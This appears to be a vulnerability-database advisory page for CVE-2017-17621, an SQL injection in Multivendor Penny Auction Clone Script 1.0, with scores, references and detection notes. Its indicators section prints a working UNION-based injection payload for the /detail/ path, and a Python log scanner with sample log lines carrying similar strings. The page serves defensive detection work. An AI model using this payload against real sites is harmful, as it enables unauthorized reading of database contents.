CVE-2017-17621
Published 2017-12-13
CVE-2017-17621: Multivendor Penny Auction Clone Script 1.0 has SQL Injection via the PATH_INFO to the /detail URI.
Priority P260 · critical · 9.8 (CVSS 3.0)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 3.62% (88.1th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| multivendor_penny_auction_clone_script_project | multivendor_penny_auction_clone_script | — | — |
Detection & IOCs (extracted from sources)
url: `http://server/bidding/detail/-48++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))--+-`
command: `-48++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))--+-`
- SQL injection is delivered via the PATH_INFO component of the URL (not a query parameter), targeting the /detail/ URI endpoint. Monitor HTTP access logs for UNION-based SQL payloads in the URL path segment following /detail/.
- Look for URL-path segments containing SQL keywords such as UNION, SELECT, CONCAT_WS, and comment sequences (--+-) immediately after /detail/ in HTTP request logs.
- The exploit uses a negative integer offset (-48) combined with UNION SELECT to trigger error-based/union-based data exfiltration of USER(), DATABASE(), and VERSION() via CONCAT_WS with hex delimiter 0x203a20.
- The exploit was tested against version 1.0 only; other versions of the Multivendor Penny Auction Clone Script may or may not be affected.
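The access-log check described in the notes above, as an added example that is not part of the original page or of any vendor tooling: it percent-decodes the path segment after /detail/ and flags requests that carry at least two of the listed indicators. The combined log format, the two-indicator threshold, the product-slug path and all sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Keywords named in the detection notes above.
KEYWORD_RE = re.compile(r"\b(union|select|concat_ws)\b", re.I)
# Trailing SQL comment such as "--+-" or "-- -".
COMMENT_RE = re.compile(r"--[\s+]*-?$")


def detail_segment(target):
    """Return the percent-decoded path text after /detail/, or None."""
    path = target.split("?", 1)[0]  # PATH_INFO only; the query string is ignored
    _, marker, rest = path.partition("/detail/")
    return unquote(rest) if marker else None


def indicators(segment):
    """Return the set of SQL indicators present in one path segment."""
    found = {kw.lower() for kw in KEYWORD_RE.findall(segment)}
    if COMMENT_RE.search(segment):
        found.add("comment")
    return found


def scan(lines):
    """Return (line_no, client_ip, indicators) for each suspicious request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        segment = detail_segment(m.group("target")) if m else None
        found = indicators(segment) if segment is not None else set()
        if len(found) >= 2:  # a single keyword may just be a product slug
            hits.append((no, m.group("ip"), sorted(found)))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [13/Dec/2017:10:00:01 +0000] "GET /bidding/detail/48 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Dec/2017:10:00:05 +0000] "GET /bidding/detail/-48++UNION(SELECT(1),(2),(3))--+- HTTP/1.1" 200 5342',
    '192.0.2.11 - - [13/Dec/2017:10:00:09 +0000] "GET /bidding/detail/select-watch-12 HTTP/1.1" 200 4988',
    '198.51.100.7 - - [13/Dec/2017:10:00:12 +0000] "GET /bidding/detail/-48%20union(select(1),(2))--%20- HTTP/1.1" 200 5342',
    '192.0.2.12 - - [13/Dec/2017:10:00:15 +0000] "GET /search?q=union+select HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Because the match is on the decoded path rather than the raw request line, the percent-encoded request on line 4 is caught alongside the literal one on line 2, while the single-keyword slug and the query-string request are left alone.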
CVSS provenance
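| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |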
No detection rules found.
No writeups or analysis indexed.
- https://packetstormsecurity.com/files/145331/Multivendor-Penny-Auction-Clone-Script-1.0-SQL-Injection.html
- https://packetstormsecurity.com/files/145333/Multivendor-Penny-Auction-Clone-Script-1.0-SQL-Injection.html
- https://www.exploit-db.com/exploits/43290/
Published: 2017-12-13